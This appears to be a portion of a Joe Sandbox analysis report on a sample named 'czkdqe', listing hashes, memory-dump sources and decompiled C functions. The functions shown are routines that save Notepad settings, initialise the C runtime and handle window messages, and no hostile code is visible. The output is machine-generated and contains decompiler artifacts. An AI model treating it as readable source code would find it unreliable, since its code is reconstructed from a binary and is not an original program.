                                                                                    • Opcode Fuzzy Hash: bded30a880d91434e9ea7b6cf477416163f9988ffaad514a95d85cac01b9da64
                                                                                    • Instruction Fuzzy Hash: 5B9002A425114456C6101B715D1954965946A49712B528871A442DC094DABB50509A29
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                    • Instruction ID: bbc41ffdf762938798602bae5def4570f77873a3deb107df23a6a6889271ef72
                                                                                    • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                    • Instruction Fuzzy Hash: 9411AC36600119AFCB20EF69C8849AABBE9FF547A47048416FC55CB254E334EE81D794
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                    • Instruction ID: 988b4b71c38baa2d55ec7360c184d4fb38097fd52889c668bb5c07251a176ff5
                                                                                    • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                    • Instruction Fuzzy Hash: 03E01A35664549EFDB44CBA8CD85D65B7F8FB09320B584A90F925C73E1E634EE00EA50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                    • Instruction ID: 63f8ac0e5b7be43f0f51470ccd1751e3cd08779ddc99cb802291a6dbfbcf8b4f
                                                                                    • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                    • Instruction Fuzzy Hash: F4E04F336106149FCB619B59CD44D96FBE9FB887B0B495826ED4997650C330FC01E790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                    • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                    • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                    • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E004011CB(signed int __edx) {
                                                                                    				void* _v8;
                                                                                    				char _v12;
                                                                                    				char _v16;
                                                                                    				int _v20;
                                                                                    				void* _v36;
                                                                                    				struct _WINDOWPLACEMENT _v64;
                                                                                    				long _t78;
                                                                                    				char _t81;
                                                                                    				char _t84;
                                                                                    				char _t87;
                                                                                    				intOrPtr _t90;
                                                                                    				intOrPtr _t94;
                                                                                    				char _t104;
                                                                                    				char _t110;
                                                                                    				char _t128;
                                                                                    				char _t143;
                                                                                    				int _t146;
                                                                                    				signed int _t147;
                                                                                    				signed int _t164;
                                                                                    				int _t167;
                                                                                    
                                                                                    				_t164 = __edx;
                                                                                    				_t78 = RegCreateKeyExW(0x80000001, L"Software\\Microsoft\\Notepad", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v20);
                                                                                    				if(_t78 == 0) {
                                                                                    					_v64.length = 0x2c;
                                                                                    					GetWindowPlacement( *0x415f64,  &_v64);
                                                                                    					_t81 =  *0x415fdc; // 0x0
                                                                                    					asm("movsd");
                                                                                    					asm("movsd");
                                                                                    					asm("movsd");
                                                                                    					asm("movsd");
                                                                                    					_t167 = 4;
                                                                                    					_v12 = _t81;
                                                                                    					RegSetValueExW(_v8, L"fWrap", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_t84 =  *0x4151c4; // 0x0
                                                                                    					_v12 = _t84;
                                                                                    					RegSetValueExW(_v8, L"iWindowPosX", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_t87 =  *0x4151c8; // 0x0
                                                                                    					_v12 = _t87;
                                                                                    					RegSetValueExW(_v8, L"iWindowPosY", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_t90 =  *0x4151cc; // 0x0
                                                                                    					_v12 = _t90 -  *0x4151c4;
                                                                                    					RegSetValueExW(_v8, L"iWindowPosDX", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_t94 =  *0x4151d0; // 0x0
                                                                                    					_v12 = _t94 -  *0x4151c8;
                                                                                    					RegSetValueExW(_v8, L"iWindowPosDY", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x415f97 & 0x000000ff;
                                                                                    					RegSetValueExW(_v8, L"lfCharSet", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x415f99 & 0x000000ff;
                                                                                    					RegSetValueExW(_v8, L"lfClipPrecision", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_t104 =  *0x415f88; // 0x0
                                                                                    					_v12 = _t104;
                                                                                    					RegSetValueExW(_v8, L"lfEscapement", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x415f94 & 0x000000ff;
                                                                                    					RegSetValueExW(_v8, L"lfItalic", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_t110 =  *0x415f8c; // 0x0
                                                                                    					_v12 = _t110;
                                                                                    					RegSetValueExW(_v8, L"lfOrientation", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x415f98 & 0x000000ff;
                                                                                    					RegSetValueExW(_v8, L"lfOutPrecision", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x415f9b & 0x000000ff;
                                                                                    					RegSetValueExW(_v8, L"lfPitchAndFamily", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x415f9a & 0x000000ff;
                                                                                    					RegSetValueExW(_v8, L"lfQuality", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x415f96 & 0x000000ff;
                                                                                    					RegSetValueExW(_v8, L"lfStrikeOut", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x415f95 & 0x000000ff;
                                                                                    					RegSetValueExW(_v8, L"lfUnderline", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_t128 =  *0x415f90; // 0x0
                                                                                    					_v12 = _t128;
                                                                                    					RegSetValueExW(_v8, L"lfWeight", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x416cd0;
                                                                                    					RegSetValueExW(_v8, L"iMarginTop", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x416cd4;
                                                                                    					RegSetValueExW(_v8, L"iMarginBottom", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x416cd8;
                                                                                    					RegSetValueExW(_v8, L"iMarginLeft", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_v12 =  *0x416cdc;
                                                                                    					RegSetValueExW(_v8, L"iMarginRight", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_t143 =  *0x415f78; // 0x0
                                                                                    					_v12 = _t143;
                                                                                    					RegSetValueExW(_v8, L"bStatusBar", 0, 0x4151c4,  &_v12, 0x4151c4);
                                                                                    					_t146 = E00401051();
                                                                                    					_t147 =  *0x415f80; // 0x0
                                                                                    					asm("cdq");
                                                                                    					_v16 = MulDiv((_t147 ^ _t164) - _t164, 0x2d0, _t146);
                                                                                    					RegSetValueExW(_v8, L"iPointSize", 0, _t167,  &_v16, 0x4151c4);
                                                                                    					RegSetValueExW(_v8, L"lfFaceName", 0, 1, 0x415f9c, lstrlenW(0x415f9c) + _t153);
                                                                                    					RegSetValueExW(_v8, L"szHeader", 0, 1, 0x416ce0, lstrlenW(0x416ce0) + _t156);
                                                                                    					RegSetValueExW(_v8, L"szTrailer", 0, 1, 0x416ee8, lstrlenW(0x416ee8) + _t159);
                                                                                    					return RegCloseKey(_v8);
                                                                                    				}
                                                                                    				return _t78;
                                                                                    			}























                                                                                    0x004011cb
                                                                                    0x004011ef
                                                                                    0x004011f7
                                                                                    0x00401209
                                                                                    0x00401210
                                                                                    0x00401216
                                                                                    0x00401223
                                                                                    0x00401224
                                                                                    0x00401225
                                                                                    0x00401228
                                                                                    0x0040122f
                                                                                    0x00401231
                                                                                    0x00401242
                                                                                    0x00401244
                                                                                    0x0040124a
                                                                                    0x0040125b
                                                                                    0x0040125d
                                                                                    0x00401263
                                                                                    0x00401274
                                                                                    0x00401276
                                                                                    0x00401282
                                                                                    0x00401293
                                                                                    0x00401295
                                                                                    0x004012a1
                                                                                    0x004012b2
                                                                                    0x004012bc
                                                                                    0x004012cd
                                                                                    0x004012d6
                                                                                    0x004012e8
                                                                                    0x004012ea
                                                                                    0x004012f0
                                                                                    0x00401301
                                                                                    0x0040130b
                                                                                    0x0040131c
                                                                                    0x0040131e
                                                                                    0x00401324
                                                                                    0x00401335
                                                                                    0x0040133f
                                                                                    0x00401350
                                                                                    0x0040135a
                                                                                    0x0040136b
                                                                                    0x00401375
                                                                                    0x00401386
                                                                                    0x00401390
                                                                                    0x004013a1
                                                                                    0x004013aa
                                                                                    0x004013bc
                                                                                    0x004013be
                                                                                    0x004013c4
                                                                                    0x004013d5
                                                                                    0x004013dd
                                                                                    0x004013ee
                                                                                    0x004013f6
                                                                                    0x00401407
                                                                                    0x0040140f
                                                                                    0x00401420
                                                                                    0x00401428
                                                                                    0x00401439
                                                                                    0x0040143b
                                                                                    0x00401441
                                                                                    0x00401452
                                                                                    0x00401454
                                                                                    0x0040145a
                                                                                    0x0040145f
                                                                                    0x00401471
                                                                                    0x00401482
                                                                                    0x004014a4
                                                                                    0x004014c0
                                                                                    0x004014dc
                                                                                    0x00000000
                                                                                    0x004014e8
                                                                                    0x004014eb

                                                                                    APIs
                                                                                    • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004011EF
                                                                                    • GetWindowPlacement.USER32(?), ref: 00401210
                                                                                    • RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00401242
                                                                                    • RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0040125B
                                                                                    • RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 00401274
                                                                                    • RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00401293
                                                                                    • RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 004012B2
                                                                                    • RegSetValueExW.ADVAPI32(?,lfCharSet,00000000,00000004,?,00000004), ref: 004012CD
                                                                                    • RegSetValueExW.ADVAPI32(?,lfClipPrecision,00000000,00000004,?,00000004), ref: 004012E8
                                                                                    • RegSetValueExW.ADVAPI32(?,lfEscapement,00000000,00000004,?,00000004), ref: 00401301
                                                                                    • RegSetValueExW.ADVAPI32(?,lfItalic,00000000,00000004,?,00000004), ref: 0040131C
                                                                                    • RegSetValueExW.ADVAPI32(?,lfOrientation,00000000,00000004,?,00000004), ref: 00401335
                                                                                    • RegSetValueExW.ADVAPI32(?,lfOutPrecision,00000000,00000004,?,00000004), ref: 00401350
                                                                                    • RegSetValueExW.ADVAPI32(?,lfPitchAndFamily,00000000,00000004,?,00000004), ref: 0040136B
                                                                                    • RegSetValueExW.ADVAPI32(?,lfQuality,00000000,00000004,?,00000004), ref: 00401386
                                                                                    • RegSetValueExW.ADVAPI32(?,lfStrikeOut,00000000,00000004,?,00000004), ref: 004013A1
                                                                                    • RegSetValueExW.ADVAPI32(?,lfUnderline,00000000,00000004,?,00000004), ref: 004013BC
                                                                                    • RegSetValueExW.ADVAPI32(?,lfWeight,00000000,00000004,?,00000004), ref: 004013D5
                                                                                    • RegSetValueExW.ADVAPI32(?,iMarginTop,00000000,00000004,?,00000004), ref: 004013EE
                                                                                    • RegSetValueExW.ADVAPI32(?,iMarginBottom,00000000,00000004,?,00000004), ref: 00401407
                                                                                    • RegSetValueExW.ADVAPI32(?,iMarginLeft,00000000,00000004,?,00000004), ref: 00401420
                                                                                    • RegSetValueExW.ADVAPI32(?,iMarginRight,00000000,00000004,?,00000004), ref: 00401439
                                                                                    • RegSetValueExW.ADVAPI32(?,bStatusBar,00000000,00000004,?,00000004), ref: 00401452
                                                                                      • Part of subcall function 00401051: RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 00401069
                                                                                      • Part of subcall function 00401051: RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,?,?,?), ref: 00401090
                                                                                      • Part of subcall function 00401051: RegCloseKey.ADVAPI32(?), ref: 004010AB
                                                                                    • MulDiv.KERNEL32(00000000,000002D0,00000000), ref: 0040146A
                                                                                    • RegSetValueExW.ADVAPI32(?,iPointSize,00000000,00000004,?,00000004), ref: 00401482
                                                                                    • lstrlenW.KERNEL32(00415F9C), ref: 0040148F
                                                                                    • RegSetValueExW.ADVAPI32(?,lfFaceName,00000000,00000001,00415F9C,00000000), ref: 004014A4
                                                                                    • lstrlenW.KERNEL32(00416CE0), ref: 004014AB
                                                                                    • RegSetValueExW.ADVAPI32(?,szHeader,00000000,00000001,00416CE0,00000000), ref: 004014C0
                                                                                    • lstrlenW.KERNEL32(00416EE8), ref: 004014C7
                                                                                    • RegSetValueExW.ADVAPI32(?,szTrailer,00000000,00000001,00416EE8,00000000), ref: 004014DC
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004014E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$lstrlen$Close$CreateOpenPlacementQueryWindow
                                                                                    • String ID: ,$Software\Microsoft\Notepad$bStatusBar$fWrap$iMarginBottom$iMarginLeft$iMarginRight$iMarginTop$iPointSize$iWindowPosDX$iWindowPosDY$iWindowPosX$iWindowPosY$lfCharSet$lfClipPrecision$lfEscapement$lfFaceName$lfItalic$lfOrientation$lfOutPrecision$lfPitchAndFamily$lfQuality$lfStrikeOut$lfUnderline$lfWeight$szHeader$szTrailer
                                                                                    • API String ID: 3965342766-4088090211
                                                                                    • Opcode ID: c20fdf0be47cd7dd985298f809fffadeaa9cccdaab9f16faed17015c80af1ec7
                                                                                    • Instruction ID: 4b1105d802719206c16219924c3284388b7f1d0651c537867ca8293f0a584477
                                                                                    • Opcode Fuzzy Hash: c20fdf0be47cd7dd985298f809fffadeaa9cccdaab9f16faed17015c80af1ec7
                                                                                    • Instruction Fuzzy Hash: 33A1E8B294021CFEDB01DB95DD85EEFBFBDEB85B44F2040A7B500E2160D6B55E809B68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 62%
                                                                                    			E004073F2(void* __ebx) {
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				_Unknown_base(*)()* _t7;
                                                                                    				long _t10;
                                                                                    				void* _t11;
                                                                                    				int _t12;
                                                                                    				void* _t14;
                                                                                    				void* _t15;
                                                                                    				void* _t16;
                                                                                    				void* _t18;
                                                                                    				intOrPtr _t21;
                                                                                    				long _t26;
                                                                                    				void* _t30;
                                                                                    				struct HINSTANCE__* _t35;
                                                                                    				intOrPtr* _t36;
                                                                                    				void* _t39;
                                                                                    				intOrPtr* _t41;
                                                                                    				void* _t42;
                                                                                    
                                                                                    				_t30 = __ebx;
                                                                                    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                    				if(_t35 != 0) {
                                                                                    					 *0x415a54 = GetProcAddress(_t35, "FlsAlloc");
                                                                                    					 *0x415a58 = GetProcAddress(_t35, "FlsGetValue");
                                                                                    					 *0x415a5c = GetProcAddress(_t35, "FlsSetValue");
                                                                                    					_t7 = GetProcAddress(_t35, "FlsFree");
                                                                                    					__eflags =  *0x415a54;
                                                                                    					_t39 = TlsSetValue;
                                                                                    					 *0x415a60 = _t7;
                                                                                    					if( *0x415a54 == 0) {
                                                                                    						L6:
                                                                                    						 *0x415a58 = TlsGetValue;
                                                                                    						 *0x415a54 = E00407102;
                                                                                    						 *0x415a5c = _t39;
                                                                                    						 *0x415a60 = TlsFree;
                                                                                    					} else {
                                                                                    						__eflags =  *0x415a58;
                                                                                    						if( *0x415a58 == 0) {
                                                                                    							goto L6;
                                                                                    						} else {
                                                                                    							__eflags =  *0x415a5c;
                                                                                    							if( *0x415a5c == 0) {
                                                                                    								goto L6;
                                                                                    							} else {
                                                                                    								__eflags = _t7;
                                                                                    								if(_t7 == 0) {
                                                                                    									goto L6;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					_t10 = TlsAlloc();
                                                                                    					 *0x414584 = _t10;
                                                                                    					__eflags = _t10 - 0xffffffff;
                                                                                    					if(_t10 == 0xffffffff) {
                                                                                    						L15:
                                                                                    						_t11 = 0;
                                                                                    						__eflags = 0;
                                                                                    					} else {
                                                                                    						_t12 = TlsSetValue(_t10,  *0x415a58);
                                                                                    						__eflags = _t12;
                                                                                    						if(_t12 == 0) {
                                                                                    							goto L15;
                                                                                    						} else {
                                                                                    							E00406741();
                                                                                    							_t41 = __imp__EncodePointer;
                                                                                    							_t14 =  *_t41( *0x415a54);
                                                                                    							 *0x415a54 = _t14;
                                                                                    							_t15 =  *_t41( *0x415a58);
                                                                                    							 *0x415a58 = _t15;
                                                                                    							_t16 =  *_t41( *0x415a5c);
                                                                                    							 *0x415a5c = _t16;
                                                                                    							 *0x415a60 =  *_t41( *0x415a60);
                                                                                    							_t18 = E0040A1DD();
                                                                                    							__eflags = _t18;
                                                                                    							if(_t18 == 0) {
                                                                                    								L14:
                                                                                    								E0040713F();
                                                                                    								goto L15;
                                                                                    							} else {
                                                                                    								_t36 = __imp__DecodePointer;
                                                                                    								_t21 =  *((intOrPtr*)( *_t36()))( *0x415a54, E004072C3);
                                                                                    								 *0x414580 = _t21;
                                                                                    								__eflags = _t21 - 0xffffffff;
                                                                                    								if(_t21 == 0xffffffff) {
                                                                                    									goto L14;
                                                                                    								} else {
                                                                                    									_t42 = E00408C3F(1, 0x214);
                                                                                    									__eflags = _t42;
                                                                                    									if(_t42 == 0) {
                                                                                    										goto L14;
                                                                                    									} else {
                                                                                    										__eflags =  *((intOrPtr*)( *_t36()))( *0x415a5c,  *0x414580, _t42);
                                                                                    										if(__eflags == 0) {
                                                                                    											goto L14;
                                                                                    										} else {
                                                                                    											_push(0);
                                                                                    											_push(_t42);
                                                                                    											E0040717C(_t30, _t36, _t42, __eflags);
                                                                                    											_t26 = GetCurrentThreadId();
                                                                                    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                    											 *_t42 = _t26;
                                                                                    											_t11 = 1;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					return _t11;
                                                                                    				} else {
                                                                                    					E0040713F();
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}





















                                                                                    0x004073f2
                                                                                    0x00407400
                                                                                    0x00407404
                                                                                    0x00407424
                                                                                    0x00407431
                                                                                    0x0040743e
                                                                                    0x00407443
                                                                                    0x00407445
                                                                                    0x0040744c
                                                                                    0x00407452
                                                                                    0x00407457
                                                                                    0x0040746f
                                                                                    0x00407474
                                                                                    0x0040747e
                                                                                    0x00407488
                                                                                    0x0040748e
                                                                                    0x00407459
                                                                                    0x00407459
                                                                                    0x00407460
                                                                                    0x00000000
                                                                                    0x00407462
                                                                                    0x00407462
                                                                                    0x00407469
                                                                                    0x00000000
                                                                                    0x0040746b
                                                                                    0x0040746b
                                                                                    0x0040746d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040746d
                                                                                    0x00407469
                                                                                    0x00407460
                                                                                    0x00407493
                                                                                    0x00407499
                                                                                    0x0040749e
                                                                                    0x004074a1
                                                                                    0x00407568
                                                                                    0x00407568
                                                                                    0x00407568
                                                                                    0x004074a7
                                                                                    0x004074ae
                                                                                    0x004074b0
                                                                                    0x004074b2
                                                                                    0x00000000
                                                                                    0x004074b8
                                                                                    0x004074b8
                                                                                    0x004074c3
                                                                                    0x004074c9
                                                                                    0x004074d1
                                                                                    0x004074d6
                                                                                    0x004074de
                                                                                    0x004074e3
                                                                                    0x004074eb
                                                                                    0x004074f2
                                                                                    0x004074f7
                                                                                    0x004074fc
                                                                                    0x004074fe
                                                                                    0x00407563
                                                                                    0x00407563
                                                                                    0x00000000
                                                                                    0x00407500
                                                                                    0x00407500
                                                                                    0x00407513
                                                                                    0x00407515
                                                                                    0x0040751a
                                                                                    0x0040751d
                                                                                    0x00000000
                                                                                    0x0040751f
                                                                                    0x0040752b
                                                                                    0x0040752f
                                                                                    0x00407531
                                                                                    0x00000000
                                                                                    0x00407533
                                                                                    0x00407544
                                                                                    0x00407546
                                                                                    0x00000000
                                                                                    0x00407548
                                                                                    0x00407548
                                                                                    0x0040754a
                                                                                    0x0040754b
                                                                                    0x00407552
                                                                                    0x00407558
                                                                                    0x0040755c
                                                                                    0x00407560
                                                                                    0x00407560
                                                                                    0x00407546
                                                                                    0x00407531
                                                                                    0x0040751d
                                                                                    0x004074fe
                                                                                    0x004074b2
                                                                                    0x0040756c
                                                                                    0x00407406
                                                                                    0x00407406
                                                                                    0x0040740e
                                                                                    0x0040740e

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004032DD), ref: 004073FA
                                                                                    • __mtterm.LIBCMT ref: 00407406
                                                                                      • Part of subcall function 0040713F: DecodePointer.KERNEL32(0000000A,00407568,?,004032DD), ref: 00407150
                                                                                      • Part of subcall function 0040713F: TlsFree.KERNEL32(00000025,00407568,?,004032DD), ref: 0040716A
                                                                                      • Part of subcall function 0040713F: DeleteCriticalSection.KERNEL32(00000000,00000000,77D5F3A0,?,00407568,?,004032DD), ref: 0040A244
                                                                                      • Part of subcall function 0040713F: _free.LIBCMT ref: 0040A247
                                                                                      • Part of subcall function 0040713F: DeleteCriticalSection.KERNEL32(00000025,77D5F3A0,?,00407568,?,004032DD), ref: 0040A26E
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040741C
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00407429
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00407436
                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00407443
                                                                                    • TlsAlloc.KERNEL32(?,004032DD), ref: 00407493
                                                                                    • TlsSetValue.KERNEL32(00000000,?,004032DD), ref: 004074AE
                                                                                    • __init_pointers.LIBCMT ref: 004074B8
                                                                                    • EncodePointer.KERNEL32(?,004032DD), ref: 004074C9
                                                                                    • EncodePointer.KERNEL32(?,004032DD), ref: 004074D6
                                                                                    • EncodePointer.KERNEL32(?,004032DD), ref: 004074E3
                                                                                    • EncodePointer.KERNEL32(?,004032DD), ref: 004074F0
                                                                                    • DecodePointer.KERNEL32(004072C3,?,004032DD), ref: 00407511
                                                                                    • __calloc_crt.LIBCMT ref: 00407526
                                                                                    • DecodePointer.KERNEL32(00000000,?,004032DD), ref: 00407540
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00407552
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                    • API String ID: 3698121176-3819984048
                                                                                    • Opcode ID: 5dfacebdbd241fa9c02f50907a1fe7b60bed9190aaf6ba437ccb18094116dc8a
                                                                                    • Instruction ID: abc2b01e53dd726ea6ca3b762da50172eabd6a4d95284a08a9d923f29f314dbe
                                                                                    • Opcode Fuzzy Hash: 5dfacebdbd241fa9c02f50907a1fe7b60bed9190aaf6ba437ccb18094116dc8a
                                                                                    • Instruction Fuzzy Hash: CA315031D94651EAC711AB75FC88ACA3FA5AF847A0B10863BE500A76F0DB789481CB5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			E0040232A(signed int __edx, struct HWND__* _a4, int _a8, void* _a12, unsigned int _a16) {
                                                                                    				struct tagRECT _v20;
                                                                                    				short _v540;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				signed int _t36;
                                                                                    				signed int _t38;
                                                                                    				long _t40;
                                                                                    				signed int _t41;
                                                                                    				signed int _t43;
                                                                                    				signed int _t50;
                                                                                    				int _t54;
                                                                                    				signed int _t60;
                                                                                    				signed int _t62;
                                                                                    				signed int _t68;
                                                                                    				signed int _t70;
                                                                                    				void* _t82;
                                                                                    				int _t83;
                                                                                    				signed int _t85;
                                                                                    				signed int _t87;
                                                                                    				signed int _t89;
                                                                                    				long _t94;
                                                                                    				void* _t112;
                                                                                    				void* _t113;
                                                                                    
                                                                                    				_t36 =  *0x4151c0 & 0x0000ffff;
                                                                                    				_t83 = _a8;
                                                                                    				_t113 = _t112 - 0x218;
                                                                                    				if(_t83 != _t36) {
                                                                                    					__eflags = _t83 - 0x11;
                                                                                    					if(__eflags > 0) {
                                                                                    						_t38 = _t83 - 0x111;
                                                                                    						__eflags = _t38;
                                                                                    						if(_t38 == 0) {
                                                                                    							E004021A1(_a12 & 0x0000ffff);
                                                                                    							L34:
                                                                                    							_t40 = 0;
                                                                                    							L35:
                                                                                    							return _t40;
                                                                                    						}
                                                                                    						_t41 = _t38 - 6;
                                                                                    						__eflags = _t41;
                                                                                    						if(_t41 == 0) {
                                                                                    							E00401B9F(_a12);
                                                                                    							goto L34;
                                                                                    						}
                                                                                    						_t43 = _t41 - 0x11c;
                                                                                    						__eflags = _t43;
                                                                                    						if(_t43 == 0) {
                                                                                    							DragQueryFileW(_a12, 0,  &_v540, 0x41);
                                                                                    							DragFinish(_a12);
                                                                                    							0x400000( &_v540, 0xffffffff);
                                                                                    							goto L34;
                                                                                    						}
                                                                                    						__eflags = _t43 == 0xd4;
                                                                                    						if(_t43 == 0xd4) {
                                                                                    							goto L34;
                                                                                    						}
                                                                                    						L30:
                                                                                    						_t40 = DefWindowProcW(_a4, _t83, _a12, _a16);
                                                                                    						goto L35;
                                                                                    					}
                                                                                    					if(__eflags == 0) {
                                                                                    						0x400000();
                                                                                    						__eflags = _t36;
                                                                                    						if(_t36 == 0) {
                                                                                    							goto L34;
                                                                                    						}
                                                                                    						_t40 = 1;
                                                                                    						goto L35;
                                                                                    					}
                                                                                    					_t50 = _t83 - 1;
                                                                                    					__eflags = _t50;
                                                                                    					if(_t50 == 0) {
                                                                                    						_t94 = 0x50a00144;
                                                                                    						GetClientRect(_a4,  &_v20);
